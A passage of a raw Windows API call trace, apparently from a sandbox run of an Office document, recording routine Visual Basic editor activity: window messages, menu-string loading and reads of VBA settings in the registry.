(lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x1, lParam=0x780d0e0) returned 0x780d260 [0031.839] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5ad0) returned 0x1 [0031.839] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x1, lParam=0x780d260) returned 0x0 [0031.839] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780cfc0) returned 0x0 [0031.839] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5a50) returned 0x780cf60 [0031.839] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5a50) returned 0x780cf60 [0031.839] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5940) returned 0x1 [0031.859] GetObjectA (in: h=0x9050955, c=32, pv=0x2e5c50 | out: pv=0x2e5c50) returned 32 [0031.859] GetDC (hWnd=0x0) returned 0x30108d1 [0031.859] GetDeviceCaps (hdc=0x30108d1, index=90) returned 96 [0031.859] DeleteDC (hdc=0x30108d1) returned 1 [0031.859] GetDC (hWnd=0x0) returned 0x30108d1 [0031.859] GetDeviceCaps (hdc=0x30108d1, index=88) returned 96 [0031.859] DeleteDC (hdc=0x30108d1) returned 1 [0031.859] ImageList_AddMasked (himl=0xb545000, hbmImage=0x9050955, crMask=0xff00ff) returned 21 [0031.859] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780cf00 [0031.859] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5d60) returned 0x780cf00 [0031.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=-1, lpMultiByteStr=0x2e5b70, cbMultiByte=390, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0031.859] lstrlenA (lpString="ThisDocument") returned 12 [0031.859] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5aa0) returned 0x1 [0031.859] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780cf00) returned 0x780cf60 [0031.859] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1113, wParam=0x0, lParam=0x780cf60) returned 0x1 [0031.859] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0031.859] SendMessageA (hWnd=0x10224, Msg=0x229, wParam=0x0, lParam=0x0) returned 0x10226 [0031.859] SendMessageA (hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780d3e0) returned 0x780ed00 [0031.859] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780d3e0) returned 0x780ed00 [0031.860] SendMessageA (hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5f78) returned 0x1 [0031.860] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5f78) returned 0x1 [0031.860] SendMessageA (hWnd=0x1022a, Msg=0x110a, wParam=0x1, lParam=0x780ed00) returned 0x780d320 [0031.860] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x1, lParam=0x780ed00) returned 0x780d320 [0031.860] SendMessageA (hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5f78) returned 0x1 [0031.860] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5f78) returned 0x1 [0031.860] SendMessageA (hWnd=0x1022a, Msg=0x110a, wParam=0x1, lParam=0x780d320) returned 0x780d0e0 [0031.860] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x1, lParam=0x780d320) returned 0x780d0e0 [0031.860] SendMessageA (hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5f78) returned 0x1 [0031.860] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5f78) returned 0x1 [0031.860] SendMessageA (hWnd=0x1022a, Msg=0x110a, wParam=0x1, lParam=0x780d0e0) returned 0x780d260 [0031.860] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x1, lParam=0x780d0e0) returned 0x780d260 [0031.860] SendMessageA (hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5f78) returned 0x1 [0031.860] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5f78) returned 0x1 [0031.860] SendMessageA (hWnd=0x1022a, Msg=0x110a, wParam=0x1, lParam=0x780d260) returned 0x0 [0031.860] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x1, lParam=0x780d260) returned 0x0 [0031.860] wcsncpy_s (in: _Destination=0x2e5c40, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0031.860] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0031.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x2e5b70, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0031.860] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0031.860] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5c70) returned 0x780cea0 [0031.860] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5c70) returned 0x780cea0 [0031.860] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5b80) returned 0x1 [0031.860] SendMessageA (hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780cea0) returned 0x780d3e0 [0031.860] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780cea0) returned 0x780d3e0 [0031.860] SendMessageA (hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5cd0) returned 0x1 [0031.860] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5cd0) returned 0x1 [0031.860] SendMessageA (hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5c70) returned 0x780ce40 [0031.860] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1100, wParam=0x0, lParam=0x2e5c70) returned 0x780ce40 [0031.860] LoadStringA (in: hInstance=0x7fef1850000, uID=0x845, lpBuffer=0x2e59f0, cchBufferMax=521 | out: lpBuffer="Reference to ") returned 0xd [0031.860] lstrcpynA (in: lpString1=0x2e58e0, lpString2="Normal", iMaxLength=260 | out: lpString1="Normal") returned="Normal" [0031.860] strncat_s (in: _Destination="Reference to ", _SizeInBytes=0x209, _Source="Normal", _MaxCount=0x28 | out: _Destination="Reference to Normal") returned 0x0 [0031.860] lstrlenA (lpString="Normal") returned 6 [0031.860] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110d, wParam=0x0, lParam=0x2e5800) returned 0x1 [0031.861] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x3, lParam=0x780ce40) returned 0x780cea0 [0031.861] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x1113, wParam=0x0, lParam=0x780cea0) returned 0x1 [0031.861] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x114, wParam=0x4, lParam=0x0) returned 0x0 [0031.861] SendMessageA (hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780cfc0) returned 0x780cf60 [0031.861] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x4, lParam=0x780cfc0) returned 0x780cf60 [0031.861] SendMessageA (hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5f78) returned 0x1 [0031.861] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110c, wParam=0x0, lParam=0x2e5f78) returned 0x1 [0031.861] SendMessageA (hWnd=0x1022a, Msg=0x110a, wParam=0x1, lParam=0x780cf60) returned 0x0 [0031.861] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110a, wParam=0x1, lParam=0x780cf60) returned 0x0 [0031.861] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x110b, wParam=0x9, lParam=0x780cfc0) returned 0x1 [0031.862] lstrcpyA (in: lpString1=0x2e5d80, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0031.862] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0031.862] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0031.862] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5f10 | out: phkResult=0x2e5f10*=0xa60) returned 0x0 [0031.862] LoadStringA (in: hInstance=0x7fef1850000, uID=0x330c, lpBuffer=0x2e3f20, cchBufferMax=512 | out: lpBuffer="General") returned 0x7 [0031.862] lstrlenA (lpString="General") returned 7 [0031.862] lstrcpyA (in: lpString1=0x93bffa0, lpString2="General" | out: lpString1="General") returned="General" [0031.878] qsort (in: _Base=0x91e04a0, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fee39392b4 | out: _Base=0x91e04a0) [0031.878] _msize (_Block=0x91e04a0) returned 0x1c0 [0031.878] NtdllDefWindowProc_A (hWnd=0x1022c, Msg=0x81, wParam=0x0, lParam=0x2e5940) returned 0x1 [0031.878] NtdllDefWindowProc_A (hWnd=0x1022c, Msg=0x83, wParam=0x0, lParam=0x2e59a0) returned 0x0 [0031.878] NtdllDefWindowProc_A (hWnd=0x1022c, Msg=0x1, wParam=0x0, lParam=0x2e5940) returned 0x0 [0031.878] NtdllDefWindowProc_A (hWnd=0x1022c, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0031.878] NtdllDefWindowProc_A (hWnd=0x1022c, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0031.878] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x210, wParam=0x1, lParam=0x1022c) returned 0x0 [0031.879] GetDC (hWnd=0x0) returned 0x30108d1 [0031.879] SelectObject (hdc=0x30108d1, h=0x30a0953) returned 0x18a002e [0031.879] GetTextExtentPointA (in: hdc=0x30108d1, lpString="0", c=1, lpsz=0x2e5f00 | out: lpsz=0x2e5f00) returned 1 [0031.879] ReleaseDC (hWnd=0x0, hDC=0x30108d1) returned 1 [0031.879] GetSystemMetrics (nIndex=45) returned 2 [0031.879] GetSystemMetrics (nIndex=46) returned 2 [0031.879] LoadStringA (in: hInstance=0x7fef1850000, uID=0x334a, lpBuffer=0x2e3ed0, cchBufferMax=512 | out: lpBuffer="Properties") returned 0xa [0031.879] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x81, wParam=0x0, lParam=0x2e58d0) returned 0x1 [0031.879] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x83, wParam=0x0, lParam=0x2e5920) returned 0x0 [0031.879] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x1, wParam=0x0, lParam=0x2e58b0) returned 0x0 [0031.879] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x5, wParam=0x0, lParam=0x4700b4) returned 0x0 [0031.879] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0031.879] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x210, wParam=0x1, lParam=0x1022e) returned 0x0 [0031.879] MonitorFromWindow (hwnd=0x10208, dwFlags=0x2) returned 0x10001 [0031.879] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x2e5ff8 | out: lpmi=0x2e5ff8) returned 1 [0031.879] GetSystemMetrics (nIndex=15) returned 20 [0031.880] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x24, wParam=0x0, lParam=0x2e5900) returned 0x0 [0031.880] NtdllDefWindowProc_A (hWnd=0x10230, Msg=0x81, wParam=0x0, lParam=0x2e58d0) returned 0x1 [0031.880] NtdllDefWindowProc_A (hWnd=0x10230, Msg=0x83, wParam=0x0, lParam=0x2e5920) returned 0x0 [0031.880] NtdllDefWindowProc_A (hWnd=0x10230, Msg=0x1, wParam=0x0, lParam=0x2e58b0) returned 0x0 [0031.880] NtdllDefWindowProc_A (hWnd=0x10230, Msg=0x5, wParam=0x0, lParam=0x2ae00a4) returned 0x0 [0031.880] NtdllDefWindowProc_A (hWnd=0x10230, Msg=0x3, wParam=0x0, lParam=0x32000c) returned 0x0 [0031.880] lstrcpyA (in: lpString1=0x2e5c40, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0031.880] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0031.880] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0031.880] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5dd8 | out: phkResult=0x2e5dd8*=0xa60) returned 0x0 [0031.880] LoadStringA (in: hInstance=0x7fef1850000, uID=0x823, lpBuffer=0x2e5de0, cchBufferMax=40 | out: lpBuffer="PropertiesWindow") returned 0x10 [0031.880] RegQueryValueExA (in: hKey=0xa60, lpValueName="PropertiesWindow", lpReserved=0x0, lpType=0x0, lpData=0x2e5ea0, lpcbData=0x2e5dd0*=0x1e | out: lpType=0x0, lpData=0x2e5ea0*=0x4, lpcbData=0x2e5dd0*=0x1e) returned 0x2 [0031.880] RegCloseKey (hKey=0xa60) returned 0x0 [0031.881] lstrcpyA (in: lpString1=0x2e5ea0, lpString2="" | out: lpString1="") returned="" [0031.881] lstrlenA (lpString="") returned 0 [0031.881] MonitorFromWindow (hwnd=0x10230, dwFlags=0x2) returned 0x10001 [0031.881] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x2e5de8 | out: lpmi=0x2e5de8) returned 1 [0031.884] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x210, wParam=0x3e80001, lParam=0x10234) returned 0x0 [0031.885] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x210, wParam=0x10000001, lParam=0x10232) returned 0x0 [0031.886] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x55, wParam=0x10236, lParam=0x3) returned 0x1 [0031.886] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x0 [0031.886] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x210, wParam=0x10010001, lParam=0x10236) returned 0x0 [0031.889] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x210, wParam=0x10020001, lParam=0x10238) returned 0x0 [0031.890] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x55, wParam=0x1023a, lParam=0x3) returned 0x1 [0031.890] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x0 [0031.890] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0031.890] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0031.890] DefFrameProcA (hWnd=0x10222, hWndMDIClient=0x10224, uMsg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0031.890] DefMDIChildProcA (hWnd=0x10226, uMsg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0031.890] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0031.890] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0031.890] qsort (in: _Base=0x91e04f0, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fee39392b4 | out: _Base=0x91e04f0) [0031.890] _msize (_Block=0x91e04f0) returned 0x1c0 [0031.890] OleTranslateColor () returned 0x0 [0032.002] NtdllDefWindowProc_A (hWnd=0x1022c, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0032.002] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0032.002] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x210, wParam=0x10030001, lParam=0x1023a) returned 0x0 [0032.004] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x55, wParam=0x1023c, lParam=0x3) returned 0x1 [0032.004] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x3 [0032.004] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x210, wParam=0x10040001, lParam=0x1023c) returned 0x0 [0032.007] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x210, wParam=0x10050001, lParam=0x1023e) returned 0x0 [0032.009] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x143, wParam=0x0, lParam=0x7fee3a6a93e) returned 0x0 [0032.010] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x143, wParam=0x0, lParam=0x7fee3a6a93e) returned 0x0 [0032.013] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x100, wParam=0x28, lParam=0xc9500001) returned 0x0 [0032.013] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x111, wParam=0x103e8, lParam=0x10234) returned 0x0 [0032.013] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x111, wParam=0x91000, lParam=0x10232) returned 0x0 [0032.013] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x147, wParam=0x0, lParam=0x0) returned 0x0 [0032.013] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x111, wParam=0x11000, lParam=0x10232) returned 0x0 [0032.014] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x14b, wParam=0x0, lParam=0x0) returned 0x1 [0032.014] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x2d, wParam=0x3e8, lParam=0x2e5660) returned 0x0 [0032.014] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x2d, wParam=0x1000, lParam=0x2e5660) returned 0x0 [0032.014] CallWindowProcA (lpPrevWndFunc=0xffff0227, hWnd=0x10232, Msg=0x2d, wParam=0x3e8, lParam=0x2e5660) returned 0x0 [0032.014] NtdllDefWindowProc_A (hWnd=0x1022e, Msg=0x2d, wParam=0x1000, lParam=0x2e5660) returned 0x0 [0032.014] LoadStringA (in: hInstance=0x7fef1850000, uID=0x342c, lpBuffer=0x2e3ed0, cchBufferMax=512 | out: lpBuffer="Alphabetic") returned 0xa [0032.014] LoadStringA (in: hInstance=0x7fef1850000, uID=0x342d, lpBuffer=0x2e3ed0, cchBufferMax=512 | out: lpBuffer="Categorized") returned 0xb [0032.015] lstrcpyA (in: lpString1=0x2e5b40, lpString2="Software\\Microsoft\\VBA" | out: lpString1="Software\\Microsoft\\VBA") returned="Software\\Microsoft\\VBA" [0032.015] lstrcatA (in: lpString1="Software\\Microsoft\\VBA", lpString2="\\" | out: lpString1="Software\\Microsoft\\VBA\\") returned="Software\\Microsoft\\VBA\\" [0032.015] lstrcatA (in: lpString1="Software\\Microsoft\\VBA\\", lpString2="7.1\\Common" | out: lpString1="Software\\Microsoft\\VBA\\7.1\\Common") returned="Software\\Microsoft\\VBA\\7.1\\Common" [0032.015] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", phkResult=0x2e5cd0 | out: phkResult=0x2e5cd0*=0xa48) returned 0x0 [0032.105] GetClientRect (in: hWnd=0x10228, lpRect=0x2e5b70 | out: lpRect=0x2e5b70) returned 1 [0032.109] GetClientRect (in: hWnd=0x10228, lpRect=0x2e5b70 | out: lpRect=0x2e5b70) returned 1 [0032.110] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a39, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="Menu Bar") returned 0x8 [0032.153] lstrlenA (lpString="Add-Ins") returned 7 [0032.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3a85578, cbMultiByte=7, lpWideCharStr=0x2e5ad2, cchWideChar=254 | out: lpWideCharStr="Add-Insr") returned 7 [0032.155] lstrlenA (lpString="New Object Insert") returned 17 [0032.155] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3a85598, cbMultiByte=17, lpWideCharStr=0x2e5ad2, cchWideChar=254 | out: lpWideCharStr="New Object Insert") returned 17 [0032.156] lstrlenA (lpString="Align") returned 5 [0032.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3a855ac, cbMultiByte=5, lpWideCharStr=0x2e5ad2, cchWideChar=254 | out: lpWideCharStr="Alignbject Insert") returned 5 [0032.156] lstrlenA (lpString="Center") returned 6 [0032.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3a855c0, cbMultiByte=6, lpWideCharStr=0x2e5ad2, cchWideChar=254 | out: lpWideCharStr="Centerject Insert") returned 6 [0032.157] lstrlenA (lpString="Size") returned 4 [0032.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3a855c8, cbMultiByte=4, lpWideCharStr=0x2e5ad2, cchWideChar=254 | out: lpWideCharStr="Sizeer") returned 4 [0032.157] lstrlenA (lpString="ActiveX Designer") returned 16 [0032.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3a85630, cbMultiByte=16, lpWideCharStr=0x2e5ad2, cchWideChar=254 | out: lpWideCharStr="ActiveX Designert") returned 16 [0032.158] lstrlenA (lpString="Toolbars") returned 8 [0032.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3a85648, cbMultiByte=8, lpWideCharStr=0x2e5ad2, cchWideChar=254 | out: lpWideCharStr="ToolbarsDesigner") returned 8 [0032.159] lstrlenA (lpString="MSDN on the Web") returned 15 [0032.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7fee3a85658, cbMultiByte=15, lpWideCharStr=0x2e5ad2, cchWideChar=254 | out: lpWideCharStr="MSDN on the Webr") returned 15 [0032.159] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a6f, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="Standard") returned 0x8 [0032.160] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a70, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="Edit") returned 0x4 [0032.169] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a71, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="Debug") returned 0x5 [0032.170] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a72, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="UserForm") returned 0x8 [0032.171] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a74, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="Project Window") returned 0xe [0032.171] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a75, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="AddCommandMenu") returned 0xe [0032.172] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a76, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="FileCommandWellMenu") returned 0x13 [0032.172] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a77, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="EditCommandWellMenu") returned 0x13 [0032.172] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a78, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="ViewCommandWellMenu") returned 0x13 [0032.173] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a79, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="InsertCommandWellMenu") returned 0x15 [0032.173] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a7a, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="FormatCommandWellMenu") returned 0x15 [0032.174] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a7b, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="DebugCommandWellMenu") returned 0x14 [0032.174] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a7c, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="RunCommandWellMenu") returned 0x12 [0032.175] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a7d, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="ToolsCommandWellMenu") returned 0x14 [0032.175] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a7e, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="AddInsCommandWellMenu") returned 0x15 [0032.176] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a7f, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="WindowCommandWellMenu") returned 0x15 [0032.176] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a80, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="HelpCommandWellMenu") returned 0x13 [0032.177] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a81, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="AddOtherCommandMenu") returned 0x13 [0032.177] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a82, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="Built-in Menus") returned 0xe [0032.178] LoadStringW (in: hInstance=0x7fef1850000, uID=0x4a83, lpBuffer=0x2e5ad2, cchBufferMax=255 | out: lpBuffer="DocumentMenu") returned 0xc [0032.180] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x210, wParam=0x1, lParam=0x10240) returned 0x0 [0032.182] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x210, wParam=0x1, lParam=0x10242) returned 0x0 [0032.184] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x210, wParam=0x1, lParam=0x10244) returned 0x0 [0032.185] NtdllDefWindowProc_A (hWnd=0x10228, Msg=0x210, wParam=0x1, lParam=0x10246) returned 0x0 [0032.187] IMalloc:Alloc (This=0x7fefe015380, cb=0x600) returned 0x7565570 [0032.188] IMalloc:Free (This=0x7fefe015380, pv=0x7565570) [0032.189] GetClientRect (in: hWnd=0x10228, lpRect=0x2e5b60 | out: lpRect=0x2e5b60) returned 1 [0032.192] GetClientRect (in: hWnd=0x10228, lpRect=0x2e5a40 | out: lpRect=0x2e5a40) returned 1 [0032.204] GetClientRect (in: hWnd=0x10228, lpRect=0x2e5670 | out: lpRect=0x2e5670) returned 1 [0032.204] GetClientRect (in: hWnd=0x10228, lpRect=0x2e5670 | out: lpRect=0x2e5670) returned 1 [0032.205] IsWindow (hWnd=0x10228) returned 1 [0032.205] GetClientRect (in: hWnd=0x10228, lpRect=0x2e5a10 | out: lpRect=0x2e5a10) returned 1 [0032.206] GetSystemMetrics (nIndex=2) returned 17 [0032.206] MoveWindow (hWnd=0x1022a, X=-1, Y=27, nWidth=102, nHeight=74, bRepaint=1) returned 1 [0032.206] CallWindowProcA (lpPrevWndFunc=0xffff0111, hWnd=0x1022a, Msg=0x46, 